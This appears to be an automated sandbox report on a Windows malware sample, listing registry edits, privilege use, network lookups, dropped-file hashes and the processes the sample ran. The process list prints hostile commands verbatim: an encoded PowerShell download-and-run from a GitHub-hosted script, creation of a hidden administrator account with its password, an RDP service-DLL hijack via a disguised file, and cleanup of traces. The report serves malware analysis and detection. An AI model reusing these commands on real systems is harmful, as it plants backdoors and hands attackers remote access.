| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Icon = "inetcpl.cpl#00004480" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\PMDisplayName = "Local intranet [Protected Mode]" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1200 = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400 = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\LowIcon = "inetcpl.cpl#005425" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyByPass = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\DisplayName = "Local intranet" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\CurrentLevel = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\DisplayName = "Restricted sites" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\57fd7ae31ab34c2c = 2c0053004f004600540057004100520045005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073005c0035002e0030005c00430061006300680065002c000000 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\DisplayName = "Trusted sites" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\CurrentLevel = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\LowIcon = "inetcpl.cpl#005422" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1200 = "3" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1200 = "3" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\CurrentLevel = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\e1be3f182420a0a0 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c000000 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Runs net.exe
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\icacls.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2.exe
"C:\Users\Admin\AppData\Local\Temp\6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kkn2vpbm\kkn2vpbm.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES81BF.tmp" "c:\Users\Admin\AppData\Local\Temp\kkn2vpbm\CSCE6608685DB46447B9E103BC3DF145243.TMP"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\system32\takeown.exe
"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
C:\Windows\system32\net.exe
"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
C:\Windows\system32\cmd.exe
cmd /c net start rdpdr
C:\Windows\system32\net.exe
net start rdpdr
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start rdpdr
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
C:\Windows\system32\cmd.exe
cmd /c net start TermService
C:\Windows\system32\net.exe
net start TermService
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start TermService
C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
C:\Windows\system32\net.exe
net.exe user WgaUtilAcc 000000 /del
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc MklbaCCd /add
C:\Windows\system32\net.exe
net.exe user WgaUtilAcc MklbaCCd /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc MklbaCCd /add
C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" HGNBWBGW$ /ADD
C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" HGNBWBGW$ /ADD
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" HGNBWBGW$ /ADD
C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
C:\Windows\system32\net.exe
net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc MklbaCCd
C:\Windows\system32\net.exe
net.exe user WgaUtilAcc MklbaCCd
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc MklbaCCd
C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
C:\Windows\System32\Wbem\WMIC.exe
wmic CPU get NAME
C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
C:\Windows\system32\cmd.exe
cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | www.speedtest.net | udp |
| US | 104.17.148.22:80 | www.speedtest.net | tcp |
| US | 8.8.8.8:53 | c.speedtest.net | udp |
| US | 151.101.194.219:443 | c.speedtest.net | tcp |
| US | 8.8.8.8:53 | speedtest-london.its-tg.net | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.148.17.104.in-addr.arpa | udp |
| GB | 212.82.94.119:8080 | speedtest-london.its-tg.net | tcp |
| US | 8.8.8.8:53 | ldnspeedtest.rackdog.com | udp |
| GB | 78.108.219.111:8080 | ldnspeedtest.rackdog.com | tcp |
| US | 8.8.8.8:53 | speed.uk.lon.m247.ro | udp |
| GB | 176.10.82.138:8080 | speed.uk.lon.m247.ro | tcp |
| US | 8.8.8.8:53 | speedtest.brightstar.cloud | udp |
| US | 8.8.8.8:53 | 219.194.101.151.in-addr.arpa | udp |
| GB | 77.108.131.20:8080 | speedtest.brightstar.cloud | tcp |
| US | 8.8.8.8:53 | pgf5ga4g4b.cn | udp |
| US | 8.8.8.8:53 | 119.94.82.212.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 111.219.108.78.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.82.10.176.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.131.108.77.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.14.97.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.209.201.84.in-addr.arpa | udp |
Files
memory/1280-0-0x00007FFE4CDD3000-0x00007FFE4CDD5000-memory.dmp
memory/1280-1-0x000001E698000000-0x000001E6982B0000-memory.dmp
memory/1280-2-0x00007FFE4CDD0000-0x00007FFE4D891000-memory.dmp
memory/1280-3-0x00007FFE4CDD0000-0x00007FFE4D891000-memory.dmp
memory/1280-4-0x00007FFE4CDD0000-0x00007FFE4D891000-memory.dmp
memory/1280-5-0x00007FFE4CDD0000-0x00007FFE4D891000-memory.dmp
memory/1112-8-0x00007FFE4CDD0000-0x00007FFE4D891000-memory.dmp
memory/1112-9-0x00007FFE4CDD0000-0x00007FFE4D891000-memory.dmp
memory/1112-20-0x00007FFE4CDD0000-0x00007FFE4D891000-memory.dmp
memory/1112-15-0x000002A243710000-0x000002A243732000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_g1li5pnz.1g2.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\ready.ps1
| MD5 | 3447df88de7128bdc34942334b2fab98 |
| SHA1 | 519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb |
| SHA256 | 9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9 |
| SHA512 | 2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f |
memory/1112-25-0x00007FFE4CDD0000-0x00007FFE4D891000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\kkn2vpbm\kkn2vpbm.0.cs
| MD5 | 4864fc038c0b4d61f508d402317c6e9a |
| SHA1 | 72171db3eea76ecff3f7f173b0de0d277b0fede7 |
| SHA256 | 0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84 |
| SHA512 | 9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31 |
\??\c:\Users\Admin\AppData\Local\Temp\kkn2vpbm\kkn2vpbm.cmdline
| MD5 | 5611bbde429b74ef2dc6da79cf53e8e9 |
| SHA1 | 63ab37813a0a8d755718fc71c94738237c2ab07d |
| SHA256 | b83e14d3ac77ca35ac8564be8e8c9a06729464401de58ede609478f225a62c88 |
| SHA512 | 89a2271446c7ff37c9b647ee65256df60d045d09c071b53eba3be9149400409755132ccb03957b497fc74be8579d3e7bd0b1928fed805ac9256e4401af4bf74b |
C:\Users\Admin\AppData\Local\Temp\RES81BF.tmp
| MD5 | ce311d3761124dfec931c8891cd8203c |
| SHA1 | 40171b2d366328f2a3b08fae9285b070cb3dab10 |
| SHA256 | 3c133f27256a81da4f34f49936d8e091164804ba1151d8e564dcd5f4a95d0355 |
| SHA512 | fe10a442daeaefb4e38f91dac4075140be117781a3f832fb7093d1721e2516b8bd123f48d061b773b4a6e58c8fdd92682ff9d5277a421c8ba16bd4c635d209a7 |
\??\c:\Users\Admin\AppData\Local\Temp\kkn2vpbm\CSCE6608685DB46447B9E103BC3DF145243.TMP
| MD5 | 96ab50dcc33e9c7da41729d77a34418d |
| SHA1 | 715d4e92a5d5de43aafc09daa3da5ec758e393fd |
| SHA256 | a80315752e147655b3802f7e6278ac832b76b920e02cb6f8719dd30fa4d69474 |
| SHA512 | f9889b402e65789024b5d0ad3435e1a9041a71d00124c32810629cf198866ef9d0689638eec3a95b49032163f4d6f4f28eae352426caed65f406d90b2f979bec |
memory/1112-35-0x000002A229540000-0x000002A229548000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\kkn2vpbm\kkn2vpbm.dll
| MD5 | 907f6595ecff1e17928168a31319719c |
| SHA1 | 1137bdbab8f3aa1d72557022aca73d89a6839da6 |
| SHA256 | 16bdd3fc84468b98512b57b162277348bbcf44ac3cab00eb8bac013e84b6da1e |
| SHA512 | efc906e886d295f072dcd7323feed2f27e1d674c87f45134809565407a84b41b44b5adc56f267cc9da55afad7bd4ef50e28bfc969395f28f162753847c950844 |
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1
| MD5 | 43473f4e719958639a9d89e5d8388999 |
| SHA1 | ccb79eb606a23daa4b3ff8f996a2fbf281f31491 |
| SHA256 | ce84b142a2983e1f60b3051cbff38153424a016178ce3fcf703e3694eb474734 |
| SHA512 | 1051092c5eae13758e8e01086907effc5c603cc1f9456fb2cdb951cb4b196c5c3d089ffd2e981b5d6731b0e6b24402fb2808a20f66ac6dcb1704a8f4b457b1fa |
memory/1112-38-0x000002A243D00000-0x000002A243E76000-memory.dmp
memory/1112-39-0x000002A244090000-0x000002A24429A000-memory.dmp
memory/1280-49-0x00007FFE4CDD3000-0x00007FFE4CDD5000-memory.dmp
memory/1280-50-0x00007FFE4CDD0000-0x00007FFE4D891000-memory.dmp
memory/1112-70-0x00007FFE4CDD0000-0x00007FFE4D891000-memory.dmp
C:\Windows\system32\rfxvmt.dll
| MD5 | dc39d23e4c0e681fad7a3e1342a2843c |
| SHA1 | 58fd7d50c2dca464a128f5e0435d6f0515e62073 |
| SHA256 | 6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9 |
| SHA512 | 5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7 |
C:\Windows\Branding\mediasrv.png
| MD5 | 271eacd9c9ec8531912e043bc9c58a31 |
| SHA1 | c86e20c2a10fd5c5bae4910a73fd62008d41233b |
| SHA256 | 177d6aab26c15ecf87f29f92ad0eaff355d195de1c0ef17d9cb9b7483c288934 |
| SHA512 | 87375d3e0c2505ff8d5860db4a9a2cbb88da73f492f2be937b1dfd1afa37133061b7c69121727728835eaf545ce1850ec4889bad33366b8d4dadd7838af791c0 |
C:\Windows\Branding\mediasvc.png
| MD5 | 1fa9c1e185a51b6ed443dd782b880b0d |
| SHA1 | 50145abf336a196183882ef960d285bd77dd3490 |
| SHA256 | f25560518e8bebbc0abdde4c0241833e432ad4c56f934bb18067c1abf7305959 |
| SHA512 | 16bd50a904fa062f8ec6e41f00000da5d0221164c3eda90bc1791e195b25ef74bb9e1264d7536c204f9a01ca1489ae43484ceb1e7bb4f650aacf90fa16f1c9fc |
\??\PIPE\lsarpc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/1112-89-0x00007FFE4CDD0000-0x00007FFE4D891000-memory.dmp
memory/1112-90-0x00007FFE4CDD0000-0x00007FFE4D891000-memory.dmp
memory/1112-100-0x00007FFE4CDD0000-0x00007FFE4D891000-memory.dmp
C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIAD92.tmp
| MD5 | d0e162c0bd0629323ebb1ed88df890d6 |
| SHA1 | cf3fd2652cdb6ff86d1df215977454390ed4d7bc |
| SHA256 | 3e6520cd56070637daa5c3d596e57e6b5e3bd1a25a08804ccea1ce4f50358744 |
| SHA512 | a9c82f1116fce7052d1c45984e87b8f3b9f9afeb16be558fd1ecbd54327350344f37f32bc5d4baabd3e1cf3ac0de75c8ba569c1e34aaf1094cd04641d137c117 |
memory/1112-136-0x00007FFE4CDD0000-0x00007FFE4D891000-memory.dmp
memory/1280-138-0x00007FFE4CDD0000-0x00007FFE4D891000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-21 20:43
Reported
2024-11-21 20:46
Platform
win10v2004-20241007-en
Max time kernel
149s
Max time network
150s
Command Line
Signatures
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1940 set thread context of 1540 | N/A | C:\Users\Admin\AppData\Local\Temp\Order.exe | C:\Users\Admin\AppData\Local\Temp\Order.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Order.exe | N/A |
